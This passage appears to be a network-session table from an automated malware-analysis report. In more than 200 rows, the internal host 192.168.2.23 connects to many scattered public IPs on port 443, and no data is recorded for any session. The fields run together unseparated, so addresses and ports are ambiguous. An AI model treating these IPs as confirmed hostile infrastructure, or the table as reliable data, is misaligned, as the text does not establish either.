                                                13071192.168.2.2341938167.106.245.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13072192.168.2.2357154120.153.241.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13073192.168.2.2358306223.202.111.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13074192.168.2.236096466.169.60.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13075192.168.2.2353610145.137.191.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13076192.168.2.234553485.16.181.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13077192.168.2.2351310149.193.47.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13078192.168.2.2335984183.5.21.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13079192.168.2.2346028165.143.159.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13080192.168.2.2335836151.136.106.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13081192.168.2.233961254.107.153.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13082192.168.2.2338496200.57.109.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13083192.168.2.236083837.224.18.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13084192.168.2.2351478203.198.132.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13085192.168.2.2341656190.42.179.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13086192.168.2.2336688181.235.174.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13087192.168.2.234251462.98.108.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13088192.168.2.2337506174.21.136.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13089192.168.2.234429662.15.36.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13090192.168.2.2358418120.18.181.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13091192.168.2.235708474.251.253.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13092192.168.2.236043079.166.246.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13093192.168.2.2349736185.133.169.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13094192.168.2.2335554220.44.136.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13095192.168.2.2338144164.69.111.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13096192.168.2.233602239.42.162.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13097192.168.2.234050463.253.35.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13098192.168.2.235445092.189.236.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13099192.168.2.2358892167.90.243.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13100192.168.2.2355460125.253.242.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13101192.168.2.233314276.211.144.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13102192.168.2.233469438.145.161.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13103192.168.2.2344042102.135.244.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13104192.168.2.234828850.92.92.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13105192.168.2.2346982197.15.79.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13106192.168.2.23517929.91.202.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13107192.168.2.234698474.125.248.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13108192.168.2.235265047.42.235.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13109192.168.2.234500260.210.122.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13110192.168.2.235255642.227.88.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13111192.168.2.234743019.28.17.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13112192.168.2.234279283.169.29.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13113192.168.2.234250057.5.237.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13114192.168.2.2337570165.66.254.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13115192.168.2.2341598180.132.132.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13116192.168.2.2351606211.10.195.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13117192.168.2.2360844168.179.192.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13118192.168.2.2346454125.226.237.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13119192.168.2.2358598220.217.185.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13120192.168.2.233844427.239.57.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13121192.168.2.2346184202.8.153.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13122192.168.2.2341790117.66.85.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13123192.168.2.23550609.210.191.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13124192.168.2.2359292189.71.133.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13125192.168.2.235910686.214.66.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13126192.168.2.2358896189.53.134.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13127192.168.2.2360194191.115.67.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13128192.168.2.2353288125.78.58.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13129192.168.2.2358808157.63.25.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13130192.168.2.2351036107.9.118.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13131192.168.2.235917046.230.198.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13132192.168.2.2354028125.102.178.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13133192.168.2.2333530104.53.250.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13134192.168.2.23453304.189.83.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13135192.168.2.233610620.242.159.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13136192.168.2.2357180220.188.0.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13137192.168.2.234121461.39.242.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13138192.168.2.2348744151.74.166.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13139192.168.2.233895241.16.62.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13140192.168.2.2342418210.81.117.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13141192.168.2.2337040174.249.177.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13142192.168.2.235714470.134.26.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13143192.168.2.2337532202.122.221.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13144192.168.2.2355722183.194.65.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13145192.168.2.2356196124.221.232.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13146192.168.2.2346822223.208.81.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13147192.168.2.2360840136.105.76.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13148192.168.2.234919860.88.1.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13149192.168.2.233964090.223.247.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13150192.168.2.2348142201.72.112.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13151192.168.2.23377985.195.204.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13152192.168.2.2333660176.64.239.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13153192.168.2.233352250.34.82.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13154192.168.2.2348284191.223.121.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13155192.168.2.2345584142.93.101.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13156192.168.2.2359470108.100.48.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13157192.168.2.2350916200.165.243.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13158192.168.2.234518492.183.53.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13159192.168.2.235752453.88.241.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13160192.168.2.2345118149.241.115.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13161192.168.2.2352840129.168.184.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13162192.168.2.2345726131.131.90.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13163192.168.2.2355894197.191.67.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13164192.168.2.233893439.32.129.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13165192.168.2.235346866.225.176.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13166192.168.2.2351694202.214.95.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13167192.168.2.2357072149.235.68.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13168192.168.2.234729417.252.199.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13169192.168.2.235904457.120.228.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13170192.168.2.233821252.204.201.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13171192.168.2.235326083.108.221.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13172192.168.2.2348958105.227.88.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13173192.168.2.2352362170.108.90.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13174192.168.2.2334878170.46.174.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13175192.168.2.236074261.211.196.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13176192.168.2.235070496.218.145.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13177192.168.2.2341602104.224.108.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13178192.168.2.233669478.191.192.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13179192.168.2.234043889.157.28.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13180192.168.2.234692624.243.209.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13181192.168.2.2333788204.157.54.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13182192.168.2.235640431.213.237.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13183192.168.2.2356668177.53.103.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13184192.168.2.234713464.178.122.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13185192.168.2.234138464.175.188.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13186192.168.2.2359524206.26.105.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13187192.168.2.2357744118.33.72.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13188192.168.2.235956623.161.91.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13189192.168.2.234548669.180.27.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13190192.168.2.2352602114.196.17.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13191192.168.2.2357324210.22.3.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192192.168.2.2348190182.188.64.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13193192.168.2.234700064.53.130.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13194192.168.2.234728460.219.16.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13195192.168.2.2359880193.92.210.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13196192.168.2.235456662.121.160.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13197192.168.2.2333466204.62.203.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13198192.168.2.234841231.51.196.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13199192.168.2.233722861.150.230.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13200192.168.2.2345912208.174.123.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13201192.168.2.2354030172.108.179.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13202192.168.2.2335222114.16.235.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13203192.168.2.2340792178.21.172.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13204192.168.2.2343470158.53.163.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13205192.168.2.235209023.39.187.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13206192.168.2.2352876162.31.222.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13207192.168.2.2352264113.23.7.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13208192.168.2.234137451.106.211.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13209192.168.2.2338326122.112.34.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13210192.168.2.2335642187.104.54.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13211192.168.2.2348466205.115.205.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13212192.168.2.236016269.67.80.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13213192.168.2.2335196185.72.53.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13214192.168.2.2343534111.230.198.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13215192.168.2.235349045.170.207.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13216192.168.2.234548099.97.8.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13217192.168.2.234294018.1.38.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13218192.168.2.2355066180.42.115.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13219192.168.2.2336844148.220.249.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13220192.168.2.233841046.189.93.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13221192.168.2.2349510223.96.60.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13222192.168.2.2349980210.74.183.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13223192.168.2.233729442.142.47.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13224192.168.2.235467271.14.102.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13225192.168.2.2336050121.204.85.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13226192.168.2.235509491.28.164.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13227192.168.2.2349638204.234.191.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13228192.168.2.2343598161.187.227.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13229192.168.2.2344770198.110.132.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13230192.168.2.235731690.204.242.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13231192.168.2.2359950105.1.216.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13232192.168.2.2340980147.61.206.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13233192.168.2.2360458156.103.27.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13234192.168.2.234709636.52.125.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13235192.168.2.2347698142.9.41.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13236192.168.2.2337894118.144.139.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13237192.168.2.2334006115.70.190.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13238192.168.2.233484475.85.35.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13239192.168.2.233489464.194.68.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13240192.168.2.234122674.148.29.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13241192.168.2.2346870189.35.108.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13242192.168.2.2336334100.159.230.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13243192.168.2.235627667.173.52.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13244192.168.2.2333984123.97.91.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13245192.168.2.2359412130.12.13.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13246192.168.2.2359484162.70.122.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13247192.168.2.233626694.26.189.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13248192.168.2.2355416197.42.141.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13249192.168.2.235104274.120.106.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13250192.168.2.234194057.84.170.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13251192.168.2.2334020129.217.21.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13252192.168.2.2334026204.245.255.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13253192.168.2.2337986156.49.142.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13254192.168.2.2356628115.42.92.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13255192.168.2.23444602.219.62.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13256192.168.2.234013066.13.202.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13257192.168.2.2347166180.221.239.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13258192.168.2.233328053.89.227.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13259192.168.2.2335530204.73.29.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13260192.168.2.236063663.164.149.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13261192.168.2.2345920195.251.244.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13262192.168.2.2359978151.82.251.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13263192.168.2.235862435.229.150.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13264192.168.2.236004281.155.128.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13265192.168.2.2344352118.131.149.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13266192.168.2.2340814148.2.116.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13267192.168.2.2360452111.111.143.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13268192.168.2.2340034168.181.175.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13269192.168.2.2351924218.0.79.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13270192.168.2.2336428217.193.164.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13271192.168.2.2333886111.85.130.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13272192.168.2.234923439.79.105.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13273192.168.2.2346534162.202.238.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13274192.168.2.234301658.161.239.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13275192.168.2.2341562161.72.115.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13276192.168.2.2350514164.229.197.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13277192.168.2.235448246.11.243.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13278192.168.2.234133438.106.88.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13279192.168.2.235195213.217.199.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13280192.168.2.2346716119.165.213.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13281192.168.2.2333012195.121.61.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13282192.168.2.2340510129.152.161.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13283192.168.2.236057687.52.203.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13284192.168.2.235732469.166.120.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13285192.168.2.235362092.47.57.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13286192.168.2.233472623.22.132.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13287192.168.2.2351380109.32.31.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13288192.168.2.2353220124.198.43.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13289192.168.2.2345062123.148.174.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13290192.168.2.2334394116.64.190.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13291192.168.2.234651024.134.36.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13292192.168.2.2359778154.45.6.240443
                                                TimestampBytes transferredDirectionData


